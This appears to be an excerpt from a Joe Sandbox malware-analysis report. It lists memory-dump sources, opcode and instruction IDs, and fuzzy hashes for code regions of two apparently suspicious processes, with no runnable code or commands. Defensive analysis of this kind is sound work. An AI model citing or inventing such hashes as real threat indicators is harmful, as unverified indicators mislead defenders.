                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ad552982bda38a1eb10193fdfa08da03c690be2c5e4fa1cc1574df658ef7657e
                                                                                                                    • Instruction ID: d2193714a967aae03e08e1c5a4ddbd8f689d6bb6a0ca1c8d152a86c21ccb9737
                                                                                                                    • Opcode Fuzzy Hash: ad552982bda38a1eb10193fdfa08da03c690be2c5e4fa1cc1574df658ef7657e
                                                                                                                    • Instruction Fuzzy Hash: B6412822B0C5590EE724F7AC64A56F97781EF5933AB0546BBE44DCB1EBCD1868418284
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 64ace7260947eae7cd011491dc63d6555fda6fc1b74fb48fab1820e0dc2b0771
                                                                                                                    • Instruction ID: deb24630cb1f457c9954220e2c7f2a96085379b0e9b8b05dc7d4f5e6f6b67cd1
                                                                                                                    • Opcode Fuzzy Hash: 64ace7260947eae7cd011491dc63d6555fda6fc1b74fb48fab1820e0dc2b0771
                                                                                                                    • Instruction Fuzzy Hash: 74313A10B1D90E0FEB58FB68846A6B977D6EF99320F5500BDE40EC32E7DD289C418381
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 559ba8779cf88b7eecea66d77b42c8774233b3b63b84a7686768a7f3e5e5bc74
                                                                                                                    • Instruction ID: cc18d331a26f904c7d2f1e2736472aeb33262f92b0f9b7b679829f8328a62bf9
                                                                                                                    • Opcode Fuzzy Hash: 559ba8779cf88b7eecea66d77b42c8774233b3b63b84a7686768a7f3e5e5bc74
                                                                                                                    • Instruction Fuzzy Hash: 8031B531A0E68E9FDF56EB64C8649A97BF0EF26300B0905FBD009D71E3DA68A945C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6ab075bc5ffd6244b50dfe5569e1692ab55bc4d706241e32651b990edfccd5ce
                                                                                                                    • Instruction ID: 41144fdd4fea6d8c41c434cb8954b080cbab6d5cc0c99c05913f69f980e831c5
                                                                                                                    • Opcode Fuzzy Hash: 6ab075bc5ffd6244b50dfe5569e1692ab55bc4d706241e32651b990edfccd5ce
                                                                                                                    • Instruction Fuzzy Hash: 5E218F71F1D50E4BFBB8E79884686B863A1FF48340F1241B9D54ED32B2DE786E41AB04
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a0700d956c94373e8480c26f29a4c3d21dabcf7b0c6ad74aabc5b56f392745e9
                                                                                                                    • Instruction ID: 15e7015dc29ab1eaa3fb8bbf52a81caa49b1b9e240e9446454a12c1e03c37b18
                                                                                                                    • Opcode Fuzzy Hash: a0700d956c94373e8480c26f29a4c3d21dabcf7b0c6ad74aabc5b56f392745e9
                                                                                                                    • Instruction Fuzzy Hash: 23210132A0E28D8FE732DBA8C8651DC7FB0DF42364F1641B7C0909B1E2DA78164AD355
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 496267b095b3f3d46eb01520270fcc65ab2fe22cbda5735a09455040edb06884
                                                                                                                    • Instruction ID: add5ab6baf245fdfbf7a2a263f2ea8435773f734d83a72617712515861a4e4bc
                                                                                                                    • Opcode Fuzzy Hash: 496267b095b3f3d46eb01520270fcc65ab2fe22cbda5735a09455040edb06884
                                                                                                                    • Instruction Fuzzy Hash: 6411CE31A0E78D8FE722DBA8C8652DD7FB0AF42314F1645F7C094DB2A2D97416498784
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 296f8888e47da523da54a174002d44a851327c523c6a19a861267ee44ada8b2b
                                                                                                                    • Instruction ID: 5415913d41c6487eef45d109c4e6e411eaf2b9db0bce721daf4bf5efd9fa23cc
                                                                                                                    • Opcode Fuzzy Hash: 296f8888e47da523da54a174002d44a851327c523c6a19a861267ee44ada8b2b
                                                                                                                    • Instruction Fuzzy Hash: E101C031A0E78C8FE722DBA8C8642DD7FB0AF42314F1645E7C494DB2A2D9745649C784
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 687b9d9874a0b158ae55e2d41c53763813932427dd081fa52e42f3d25bb1bed5
                                                                                                                    • Instruction ID: b785b8fb07b1126fe73dabef306d2eaf7a2b9307f570f29e9f281156878d9fda
                                                                                                                    • Opcode Fuzzy Hash: 687b9d9874a0b158ae55e2d41c53763813932427dd081fa52e42f3d25bb1bed5
                                                                                                                    • Instruction Fuzzy Hash: B3014F31A199198FCB69EB08C8A4AE9B3F1FF58300F11416DD04ED32A1CE34AA41CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction ID: b05b622aed075035dca605061a9e6880d340e493b3d7fd3e236d7698d0fb2b62
                                                                                                                    • Opcode Fuzzy Hash: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction Fuzzy Hash: D3F03131A4D50E4BEB78EB94D4946E833A1FB95310F22417DD50ED32B6DDB86A819A04
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8885b476f920996b9802a1a4b00f62ad2a4634ae42c8d86c18c56624388bcb60
                                                                                                                    • Instruction ID: 365e8c85c38a24ac29b6c8357bcd9c2611f091462742bdfe118332074bc88151
                                                                                                                    • Opcode Fuzzy Hash: 8885b476f920996b9802a1a4b00f62ad2a4634ae42c8d86c18c56624388bcb60
                                                                                                                    • Instruction Fuzzy Hash: 3CF0E53560D6498FD745E77DDCA54E53B50EB8721975715FBD088C7463C250085EC700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 55450da4dd73264885f9dbff5398f02c4013d43db3472fffe4c44740b348a1d8
                                                                                                                    • Instruction ID: 256823d1e0e3a155cffd1e6f53525a784de97c1d86ff614f1059d97f57cdbb9e
                                                                                                                    • Opcode Fuzzy Hash: 55450da4dd73264885f9dbff5398f02c4013d43db3472fffe4c44740b348a1d8
                                                                                                                    • Instruction Fuzzy Hash: 0A01A230A0E78D8FE722DBA488542DDBFF0AF02314F1541E7C490CB2A6D9785748C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 35bb9197a9819bd1294a0333bf7650a62addbd24aa010d4e73a4fff42078977a
                                                                                                                    • Instruction ID: 38b85a7886aab47351159d7bededb9dcb5158abf9eeeeb1fab240560f9683f02
                                                                                                                    • Opcode Fuzzy Hash: 35bb9197a9819bd1294a0333bf7650a62addbd24aa010d4e73a4fff42078977a
                                                                                                                    • Instruction Fuzzy Hash: 90E01A06F5F52F02E57533ED68620EC72504FC4A64F960272E50C840E6ACCE2695226A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction ID: 87f4f6d64bfbdf59eff54fb735e5f7404f57e9b1782a1f6ca305ee3ec695d1cd
                                                                                                                    • Opcode Fuzzy Hash: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction Fuzzy Hash: 43E09270F0B60E4EF370A7A4C425BB9A2909F50300F0505B8D60E971E2CEFC6D80AB89
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0a9216f975a8c5a1e3c20bcecc4c0d8ef718e914a350af577061018324ef753e
                                                                                                                    • Instruction ID: 8c168733edcc24896d5f89bf3a4985ccc164d76b88665c7eff4e52332c75d79d
                                                                                                                    • Opcode Fuzzy Hash: 0a9216f975a8c5a1e3c20bcecc4c0d8ef718e914a350af577061018324ef753e
                                                                                                                    • Instruction Fuzzy Hash: 04D0A701F1E45A67E37BE76408208BE18870F95729F0C0234F00EC52E9EC9C1A0162C3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction ID: b52e67cafbd7a2fbc16d01d026a821760a211dc23d966b1eb3259233bcff4101
                                                                                                                    • Opcode Fuzzy Hash: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction Fuzzy Hash: 8FC04C3052180D8FC954EB7DC98595476A0FB0D215BD60190E40DC7171E69A9DD5D741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction ID: 45205479f60db2eb9fbc4c45dc567ad88937921af7f05f9803aa4cdc4d3250df
                                                                                                                    • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction Fuzzy Hash: FDC08C3451180C8FC908EB28C88480833A0FB09300BC20090E00CC7170D259DCC0C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction ID: 86f5539a048e668cb6ec1eae6d8e67f5442812a31fd86ecf5735c35f094f1757
                                                                                                                    • Opcode Fuzzy Hash: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction Fuzzy Hash: EAB01204D5740F00E43433FB085206970405B44500FC20170D80CC0091D8CD12D42346
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000032.00000002.2375142815.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_50_2_7ffd9baa0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5[_H
                                                                                                                    • API String ID: 0-3279724263
                                                                                                                    • Opcode ID: 54c7b1ebbec08299ae65ea76692e22af10c30f4d802c6130a61e2cb93fc8ad27
                                                                                                                    • Instruction ID: d6aa24e3c4a288ac680284fc5834df97e5e9ae495c0ce72d92ed72adc747d5a1
                                                                                                                    • Opcode Fuzzy Hash: 54c7b1ebbec08299ae65ea76692e22af10c30f4d802c6130a61e2cb93fc8ad27
                                                                                                                    • Instruction Fuzzy Hash: 30912376A19B8D4FE799DB6888657A87FE1EF99310F0401BED00DD73D6CAB41800CB50
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000032.00000002.2375142815.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_50_2_7ffd9baa0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9
                                                                                                                    • API String ID: 0-3426396564
                                                                                                                    • Opcode ID: ffac835e2f05b268a47b47cbdfc9e75fd8dbe3abded5139aa5c9dce521129eec
                                                                                                                    • Instruction ID: 7986858b9e6c5300948e00b87edff46ce1d877cce2ff96440855ded4cfcc4853
                                                                                                                    • Opcode Fuzzy Hash: ffac835e2f05b268a47b47cbdfc9e75fd8dbe3abded5139aa5c9dce521129eec
                                                                                                                    • Instruction Fuzzy Hash: AA01442B72995A4BC641A73EF8601E83B40EBC61367960AB7C244CB1A2E2401C9FC3E0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000032.00000002.2375142815.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_50_2_7ffd9baa0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 17bd1383f8675d2b93907846d3e8f5108ec596be3019302080ed1b4344c8baf9
                                                                                                                    • Instruction ID: b1ba564aa91560bb5499a712b13e867db91c8e8ae5518b52bbb02f8d33c41e61
                                                                                                                    • Opcode Fuzzy Hash: 17bd1383f8675d2b93907846d3e8f5108ec596be3019302080ed1b4344c8baf9
                                                                                                                    • Instruction Fuzzy Hash: 99415922B0C5590AE728F7BC64A56F97781EF9933AF0805BFE44ECB1E7CD146841C294
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000032.00000002.2375142815.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_50_2_7ffd9baa0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d5139921f37a6314896919b0f645cb2e79cc87232d8e8a32cc5f283a0287c3bd
                                                                                                                    • Instruction ID: ba3f089426dfc047d784d87ac9ea5ef7a9080c43402b37526eb1ad03db3c232b
                                                                                                                    • Opcode Fuzzy Hash: d5139921f37a6314896919b0f645cb2e79cc87232d8e8a32cc5f283a0287c3bd
                                                                                                                    • Instruction Fuzzy Hash: AD214821B1DA0D0FEB58B76C84AA67977C3EF99320F0500BDE40EC32E7DD64AC418281
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000032.00000002.2375142815.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_50_2_7ffd9baa0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fcad181a6e7658e16e7bbb73b38649c13dcb5b925a78511a770fd3b79d5424b2
                                                                                                                    • Instruction ID: d77abb9c5a4b1f9fbf6acb1438bf0855950603962f3318c838306cb0dd9ebcc4
                                                                                                                    • Opcode Fuzzy Hash: fcad181a6e7658e16e7bbb73b38649c13dcb5b925a78511a770fd3b79d5424b2
                                                                                                                    • Instruction Fuzzy Hash: 2A215221F1950E4AEBB8EB5884686B862D2FF48700F5241B9E44ED32B2DE786E418714
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000032.00000002.2375142815.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_50_2_7ffd9baa0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c435ec07ecf514d6784a90c5784a67cedab364507c054bb60b1e910602959ba1
                                                                                                                    • Instruction ID: d03995a150cebfaa0439456c8c5444fcb636f04d95e69fa1c79bf11391da3a97
                                                                                                                    • Opcode Fuzzy Hash: c435ec07ecf514d6784a90c5784a67cedab364507c054bb60b1e910602959ba1
                                                                                                                    • Instruction Fuzzy Hash: A521F635B0D68D8FE332DBA8C8652DC7FA0EF42325F1645B7C0488B1E2D578164AC765
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000032.00000002.2375142815.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_50_2_7ffd9baa0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0957a158daaae46b94661b597c4c69bd76cf5da7330178968fafedc449fcd0cb
                                                                                                                    • Instruction ID: b3b694e88e52a625d60e796b9565975f64feafc7c6e885814ff204081e2c0fac
                                                                                                                    • Opcode Fuzzy Hash: 0957a158daaae46b94661b597c4c69bd76cf5da7330178968fafedc449fcd0cb
                                                                                                                    • Instruction Fuzzy Hash: E5012B1194E6C52FD77947B05C719A13F91CF9726070A02FAE099DB1F3C88D1986C361
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000032.00000002.2375142815.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_50_2_7ffd9baa0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 63f2cd87a19940bead77b044e16d92c718e9f0a0d933ccb996656abe0fa0def7
                                                                                                                    • Instruction ID: 5425bd2342f8a19cf1bde18fc34b59f0a41ddc710a4f8d6a478a96cd64a4f2fd
                                                                                                                    • Opcode Fuzzy Hash: 63f2cd87a19940bead77b044e16d92c718e9f0a0d933ccb996656abe0fa0def7
                                                                                                                    • Instruction Fuzzy Hash: AE11C235B0E78C8FE722DBA888612DC7FB1EF82315F0645F7C088DB1A2D57416498794
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000032.00000002.2375142815.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_50_2_7ffd9baa0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b4fdabf60c609c8c4ff3b61915eea2fade738a4859b23f4c9afce176aaeb5104
                                                                                                                    • Instruction ID: c508fc9ce9a7b61c3cbbd790999bbad639dda0ec1d91a375fb36da273890f961
                                                                                                                    • Opcode Fuzzy Hash: b4fdabf60c609c8c4ff3b61915eea2fade738a4859b23f4c9afce176aaeb5104
                                                                                                                    • Instruction Fuzzy Hash: A701AD35A0E78C8FE722DBA888642DDBFB1AF42314F0645E7C084DB1A2D97456488794
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000032.00000002.2375142815.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_50_2_7ffd9baa0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 35ccc595804bbbbe8212668e33f1cfeec1f81b7006e06908fc77525290f085c4
                                                                                                                    • Instruction ID: 8047c2a9ba09f69e47137270a41c58578f05ac1eaa5bd4ad29cb4f3db8916d58
                                                                                                                    • Opcode Fuzzy Hash: 35ccc595804bbbbe8212668e33f1cfeec1f81b7006e06908fc77525290f085c4
                                                                                                                    • Instruction Fuzzy Hash: 49014F35A199198FCB59EB08C8A4AE9B3F1FB68300F15456DD04AE32A1CA34AA41CF81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000032.00000002.2375142815.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_50_2_7ffd9baa0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction ID: a12660d053721b1531771840e89e9aabade80d1e136a6a126e72922a7545e160
                                                                                                                    • Opcode Fuzzy Hash: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction Fuzzy Hash: 41F03131A4D50E4AEB74EB94D4546F833A2FB94710F26417DE40ED32B6DDB86A818A14
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000032.00000002.2375142815.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_50_2_7ffd9baa0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 00c0e08206afc7866f57bb5ac8924bb3d9ecdd219bfddbdf5cf86e29886e76ea
                                                                                                                    • Instruction ID: 9f2b28c7994fe3d845938ed9ab705898f23b1ff2e3ff436ed9b14c37307b2170
                                                                                                                    • Opcode Fuzzy Hash: 00c0e08206afc7866f57bb5ac8924bb3d9ecdd219bfddbdf5cf86e29886e76ea
                                                                                                                    • Instruction Fuzzy Hash: 71F0AB3520DA49CFD781E73DDCA54D43B50EF8320875B15FBC088C7462C210185EC700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000032.00000002.2375142815.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_50_2_7ffd9baa0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6b9c25bc3156df739e1d238c0d700a571b7a7b2716e6448513313c38b5aff7f6
                                                                                                                    • Instruction ID: 17bed7793eb8d575539aa79a0b67965d007c0e52b022646ec77afbc318665535
                                                                                                                    • Opcode Fuzzy Hash: 6b9c25bc3156df739e1d238c0d700a571b7a7b2716e6448513313c38b5aff7f6
                                                                                                                    • Instruction Fuzzy Hash: FD01A230A0E38C9FE722DBA488942DDBFF1AF06314F1545E7C484CB1A2D9785648C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000032.00000002.2375142815.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_50_2_7ffd9baa0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 34a949e4e962d579b6237736cc27c6069c3fbb46b31f53195b6c0f83db339399
